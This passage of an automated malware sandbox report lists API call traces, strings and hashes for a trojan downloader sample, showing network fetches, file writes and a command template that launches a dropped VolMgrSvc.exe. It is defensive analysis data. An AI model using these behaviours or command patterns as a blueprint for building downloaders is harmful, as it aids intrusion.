                                                                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E1D8
                                                                                • memcpy.NTDLL(00000000,?,00000000), ref: 0040E22A
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040E267
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040E274
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040E281
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                • String ID: <$GET
                                                                                • API String ID: 1205665004-427699995
                                                                                • Opcode ID: b5606582fcf9fad391a6fa346b47e70fe2b71523f8a0056a0553dfb9fae7cb88
                                                                                • Instruction ID: 8a187a806069c9ef74607f7bf39df95f2c1829c28a5b92bcc4b0b83bf30a7a56
                                                                                • Opcode Fuzzy Hash: b5606582fcf9fad391a6fa346b47e70fe2b71523f8a0056a0553dfb9fae7cb88
                                                                                • Instruction Fuzzy Hash: 16512DB1941228ABDB36CB50CC55BE9B3BCAB48705F1444E9F60DAA2C0D7B96BC4CF54
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040ECA2
                                                                                • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040ECC3
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040ECE2
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040ECFB
                                                                                • memcmp.NTDLL ref: 0040ED8D
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040EDB0
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040EDBA
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040EDC4
                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EDE3
                                                                                • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040EE08
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040EE12
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                                • String ID:
                                                                                • API String ID: 3902698870-0
                                                                                • Opcode ID: 643dd6457151afb767136b96de088e300be71ca2aa9c529637807d59cb8df3e5
                                                                                • Instruction ID: 32b63ebe374edb734f10ceafdcfe6a9e739b08b32ae31a868bafe8a6799fa03f
                                                                                • Opcode Fuzzy Hash: 643dd6457151afb767136b96de088e300be71ca2aa9c529637807d59cb8df3e5
                                                                                • Instruction Fuzzy Hash: 20514EB4E40209FBDB14DFA4CC49BDEB774AB48704F108569E611B72C0D7B9AA40CB98
                                                                                APIs
                                                                                • GetCurrentThread.KERNEL32 ref: 0040D786
                                                                                • GetThreadPriority.KERNEL32(00000000,?,?,?,00407F75,?,000000FF), ref: 0040D78D
                                                                                • GetCurrentThread.KERNEL32 ref: 0040D798
                                                                                • SetThreadPriority.KERNEL32(00000000,?,?,?,00407F75,?,000000FF), ref: 0040D79F
                                                                                • InterlockedExchangeAdd.KERNEL32(00407F75,00000000), ref: 0040D7C2
                                                                                • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D7F7
                                                                                • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D842
                                                                                • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D85E
                                                                                • Sleep.KERNEL32(00000001), ref: 0040D88E
                                                                                • GetCurrentThread.KERNEL32 ref: 0040D89D
                                                                                • SetThreadPriority.KERNEL32(00000000,?,?,?,00407F75), ref: 0040D8A4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                • String ID:
                                                                                • API String ID: 3862671961-0
                                                                                • Opcode ID: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                                                                • Instruction ID: 6fb5641eb3e61aabfeb8d94b6f23565c140e371fca94fd76c4ad34d85bd1d77f
                                                                                • Opcode Fuzzy Hash: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                                                                • Instruction Fuzzy Hash: 32414C75E00209EBCB04EFE4D848BAEBB71EF44305F10C16AE916A7384D6789A85CF55
APIs
• InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
• InterlockedDecrement.KERNEL32(?), ref: 00401DB0
• InterlockedDecrement.KERNEL32(?), ref: 00401DC3
• InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
• InterlockedDecrement.KERNEL32(?), ref: 00401E5B
• InterlockedDecrement.KERNEL32(?), ref: 00401EF6
• setsockopt.WS2_32 ref: 00401F2C
• closesocket.WS2_32(?), ref: 00401F39
  • Part of subcall function 0040D950: NtQuerySystemTime.NTDLL(0040B865), ref: 0040D95A
  • Part of subcall function 0040D950: RtlTimeToSecondsSince1980.NTDLL ref: 0040D968
Memory Dump Source
• Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
• String ID:
APIs
• recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DD8E
• Sleep.KERNEL32(000003E8), ref: 0040DD9E
• StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DDBB
• StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DDD1
• StrChrA.SHLWAPI(?,0000000D), ref: 0040DDFE
Memory Dump Source
• Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: Sleeprecvfrom
• String ID: HTTP/1.1 200 OK$LOCATION:
APIs
• InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EEF7
• InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EF16
• HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040EF3F
• InternetCloseHandle.WININET(00000000), ref: 0040EF68
• InternetCloseHandle.WININET(00000000), ref: 0040EF72
• Sleep.KERNEL32(000003E8), ref: 0040EF7D
Strings
• Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040EEF2
Memory Dump Source
• Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
• String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
APIs
• InitializeCriticalSection.KERNEL32(0041AE68,?,?,?,?,?,?,00407EF9), ref: 0040B77B
• CreateFileW.KERNEL32(0041AC50,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B7CD
• CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B7EE
• MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B80D
• GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B822
• UnmapViewOfFile.KERNEL32(00000000), ref: 0040B888
• CloseHandle.KERNEL32(00000000), ref: 0040B892
• CloseHandle.KERNEL32(000000FF), ref: 0040B89C
  • Part of subcall function 0040D950: NtQuerySystemTime.NTDLL(0040B865), ref: 0040D95A
  • Part of subcall function 0040D950: RtlTimeToSecondsSince1980.NTDLL ref: 0040D968
Memory Dump Source
• Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
• String ID:
APIs
• InitializeCriticalSection.KERNEL32(0041A400,?,?,?,?,?,00407EC3), ref: 00405B6B
• CreateFileW.KERNEL32(0041A630,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407EC3), ref: 00405B85
• CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405BA6
• MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405BC5
• GetFileSize.KERNEL32(000000FF,00000000), ref: 00405BDE
• UnmapViewOfFile.KERNEL32(00000000), ref: 00405C6B
• CloseHandle.KERNEL32(00000000), ref: 00405C75
• CloseHandle.KERNEL32(000000FF), ref: 00405C7F
Memory Dump Source
• Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
• String ID:
APIs
• EnterCriticalSection.KERNEL32(0041A400,00000000,0040BDA2,006A0266,?,0040BDBE,00000000,0040D09C,?), ref: 0040600F
• memcpy.NTDLL(?,00000000,00000100), ref: 004060A1
• CreateFileW.KERNEL32(0041A630,40000000,00000000,00000000,00000002,00000002,00000000), ref: 004061C5
• WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406227
• FlushFileBuffers.KERNEL32(000000FF), ref: 00406233
• CloseHandle.KERNEL32(000000FF), ref: 0040623D
• LeaveCriticalSection.KERNEL32(0041A400,?,?,?,?,?,?,0040BDBE,00000000,0040D09C,?), ref: 00406248
Memory Dump Source
• Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
• String ID:
APIs
• lstrcmpiW.KERNEL32(00000000,device), ref: 0040E7AC
• lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E7FB
• SysFreeString.OLEAUT32(00000000), ref: 0040E80F
• SysFreeString.OLEAUT32(00000000), ref: 0040E827
Memory Dump Source
• Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: FreeStringlstrcmpi
• String ID: device$deviceType
APIs
• lstrcmpiW.KERNEL32(00000000,service), ref: 0040E64C
• lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E69B
• SysFreeString.OLEAUT32(00000000), ref: 0040E6AF
• SysFreeString.OLEAUT32(00000000), ref: 0040E6C7
Memory Dump Source
• Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: FreeStringlstrcmpi
• String ID: service$serviceType
APIs
• EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
• LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
Memory Dump Source
• Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: CriticalSection$EnterLeave
• String ID:
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 0040640B
                                                                                • CoCreateInstance.OLE32(00412920,00000000,00000001,00412900,?), ref: 00406423
                                                                                • wsprintfW.USER32 ref: 00406456
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Similarity
                                                                                • API ID: CreateInitializeInstancewsprintf
                                                                                • String ID: %comspec%$/c start %s & start %s\VolMgrSvc.exe$Gh@
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E7AC
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E7FB
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E80F
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E827
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: device$deviceType
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E64C
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E69B
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6AF
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6C7
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: service$serviceType
                                                                                Similarity
                                                                                • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                                • String ID: %s%s
                                                                                APIs
                                                                                • GetLogicalDrives.KERNEL32 ref: 00406346
                                                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                                                                • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                                                                • RegCloseKey.ADVAPI32(?), ref: 004063DE
                                                                                Strings
                                                                                • NoDrives, xrefs: 004063B8
                                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406387
                                                                                Similarity
                                                                                • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D634
                                                                                  • Part of subcall function 0040D700: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D740
                                                                                  • Part of subcall function 0040D700: CloseHandle.KERNEL32(?), ref: 0040D759
                                                                                • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D68F
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D6CC
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D6D7
                                                                                • DuplicateHandle.KERNEL32(00000000), ref: 0040D6DE
                                                                                • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D6F2
                                                                                Similarity
                                                                                • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                Similarity
                                                                                • API ID: _allshl_aullshr
                                                                                APIs
                                                                                • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                                • htons.WS2_32(?), ref: 00401281
                                                                                • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                                Similarity
                                                                                • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                • String ID: pdu
                                                                                APIs
                                                                                • CoInitializeEx.OLE32(00000000,00000002,?,?,00407ECD), ref: 00406F78
                                                                                • SysAllocString.OLEAUT32(C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe), ref: 00406F83
                                                                                • CoUninitialize.OLE32 ref: 00406FA8
                                                                                  • Part of subcall function 00406FC0: SysFreeString.OLEAUT32(00000000), ref: 004071D8
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00406FA2
                                                                                Strings
                                                                                • C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe, xrefs: 00406F7E
                                                                                Similarity
                                                                                • API ID: String$Free$AllocInitializeUninitialize
                                                                                • String ID: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe
                                                                                APIs
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                                  • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                  • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                  • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                Similarity
                                                                                • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(0041AC50,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B0C8
                                                                                • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B0E9
                                                                                • FlushFileBuffers.KERNEL32(000000FF), ref: 0040B0F3
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040B0FD
                                                                                • InterlockedExchange.KERNEL32(00419828,0000003D), ref: 0040B10A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                • String ID:
                                                                                • API String ID: 442028454-0
                                                                                • Opcode ID: 5693974f53a6f553ee872c1498f347a7cdbd554753dda3213ec7bc77a9e739f7
                                                                                • Instruction ID: 65abf3b26d1f33ce57344cf3d4c90c2ddc2d392c326f45743aae56010b0155a0
                                                                                • Opcode Fuzzy Hash: 5693974f53a6f553ee872c1498f347a7cdbd554753dda3213ec7bc77a9e739f7
                                                                                • Instruction Fuzzy Hash: D33149B8A40208EBCB14DF94EC45FAEB7B1FB48300F208569E511A7391D775AA51CB9A
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _allshl
                                                                                • String ID:
                                                                                • API String ID: 435966717-0
                                                                                • Opcode ID: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
                                                                                • Instruction ID: b0d0b2528f3aca05c18ea064ccca22ed782aa92eb9f3aacb3aeadda2a23aac7b
                                                                                • Opcode Fuzzy Hash: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
                                                                                • Instruction Fuzzy Hash: 92F01272A01414979B14EEFE84424CAF7E59F88374B218176FD1CE3260E570B90546F1
                                                                                APIs
                                                                                • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401346
                                                                                • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401352
                                                                                • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 0040135C
                                                                                  • Part of subcall function 0040A660: HeapFree.KERNEL32(00000000,00000000,00402612,?,00402612,?), ref: 0040A6BB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                • String ID: pdu
                                                                                • API String ID: 309973729-2320407122
                                                                                • Opcode ID: 2fd66f5c1125709e912b082e2c73e8d5efb2a89a668c62a8ecc72b7ea0d0f82b
                                                                                • Instruction ID: 49315f9b5d193dc364c5f28f0bcb7aa8bb44b0403a6660fc991bd28791f727bd
                                                                                • Opcode Fuzzy Hash: 2fd66f5c1125709e912b082e2c73e8d5efb2a89a668c62a8ecc72b7ea0d0f82b
                                                                                • Instruction Fuzzy Hash: A901D6B65003009BCB209F61ECC4D9B7778AF48310708467AFC05AB396CA39E8508775
                                                                                APIs
                                                                                • GetDriveTypeW.KERNEL32(0040629F), ref: 004062CD
                                                                                • QueryDosDeviceW.KERNEL32(0040629F,?,00000208), ref: 0040630C
                                                                                • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406324
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeviceDriveQueryType
                                                                                • String ID: \??\
                                                                                • API String ID: 1681518211-3047946824
                                                                                • Opcode ID: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                                                                • Instruction ID: fe1cba3e8f96ca8ec28924db8accccc61f2e919e988f9d14e04ecf4ac666ff3a
                                                                                • Opcode Fuzzy Hash: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
